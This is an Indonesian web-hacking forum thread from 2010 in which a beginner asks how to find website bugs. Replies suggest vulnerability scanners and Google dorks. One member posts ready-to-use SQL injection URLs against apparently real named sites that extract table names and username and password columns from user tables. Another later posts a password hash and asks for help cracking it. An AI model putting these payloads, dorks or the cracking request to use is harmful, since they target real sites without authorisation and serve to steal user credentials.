[ASK] Cara mencari bug situs

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
indroe
Posts: 10
Joined: Mon Jan 05, 2009 8:34 pm
Location: SOLO Spirit of Java
Contact:

[ASK] Cara mencari bug situs

Post by indroe » Wed Jan 27, 2010 4:09 am

bang, :cry:
aku masih bingung nih, bagaimana sih caranya cari bug sebuah situs itu?
tolong dibantu ya.. :kaca:
masih newbie soale.. hhehehehe.. pengen banyak belajar...

thanks before

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [ASK] Cara mencari bug situs

Post by poni » Wed Jan 27, 2010 5:28 am

Pakai vulnurable scanner.di forum ini search dgn keyword. Nikto,acunetix,goolag scanner.ikuti thread2 di web hacking.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [ASK] Cara mencari bug situs

Post by 3xtr3m3b0y » Wed Jan 27, 2010 8:39 am

indroe wrote:bang, :cry:
aku masih bingung nih, bagaimana sih caranya cari bug sebuah situs itu?
tolong dibantu ya.. :kaca:
masih newbie soale.. hhehehehe.. pengen banyak belajar...

thanks before
harus tau dulu jenis2 vulner yg ada pada web, stelah itu utk mencari target yg tepat bisa dgn cara yg diberikan oleh Om PONI...
...n0 l1m17...

Muhammad_ibl
Posts: 12
Joined: Fri Apr 25, 2008 4:54 pm

Re: [ASK] Cara mencari bug situs

Post by Muhammad_ibl » Sat Jan 30, 2010 7:00 am

Ne ada beberapa bug SQL Injection..Mudah-mudahan dapat menjadi bahan referensi..

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2

9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--

Code: Select all

http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b

b_password%29,3,4,5,6,7,8%20from%20bb_users--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass

word%29,3,4,5,6,7,8%20from%20cms_users--

User avatar
indroe
Posts: 10
Joined: Mon Jan 05, 2009 8:34 pm
Location: SOLO Spirit of Java
Contact:

Re: [ASK] Cara mencari bug situs

Post by indroe » Sat Jan 30, 2010 9:59 am

oke,, makasih bwat smua

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: [ASK] Cara mencari bug situs

Post by wiLMaR_kiDz » Sat Jan 30, 2010 11:03 pm

jgn lupa, manfaatin juga si mulut ember "Google".... :ngakak: :ngakak: :putusasa:
regards,
ordinary user,-

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: [ASK] Cara mencari bug situs

Post by abit doang » Sun Jan 31, 2010 3:43 pm

ikuti cara om WIL_ yaitu coba2/cari google atau situs2 kayak milw0rm dll..
lewat google misal sqli ketik inurl:news.php?id=9 atau inurl:union+all+select atau inurl:phpmyadmin
atau yg lain na, tinggal explore om google, nyari mah banyak, paling nanti mentok
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: [ASK] Cara mencari bug situs

Post by abit doang » Sun Jan 31, 2010 3:54 pm

maksud na klo mentok nanya lagi, paling susah na klo mentok d Hash. :D
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

Muhammad_ibl
Posts: 12
Joined: Fri Apr 25, 2008 4:54 pm

Re: [ASK] Cara mencari bug situs

Post by Muhammad_ibl » Fri Apr 09, 2010 7:25 pm

ada yang bisa mecahin ne hash gak ??
susah bgd gan.. udah di ubek2 si paman, tapi gak juga ketemu ..
mohon bantuannya ya agan agan yang master..
:kaca: :kaca: :kaca: :maaf: :maaf:

Code: Select all

baa18c15ce584efeeae5a4f88802658c

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [ASK] Cara mencari bug situs

Post by cyber_criminal » Fri Apr 09, 2010 8:26 pm

tlong jlasin dong ttng fungsi 0x3a..... :cry: :cry: :cry:
ane slalu terhenti di tahap ini pas make sqli :circle: :circle: :circle:
mohon bantuannya ya...
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

Post Reply

Return to “Web Hacking”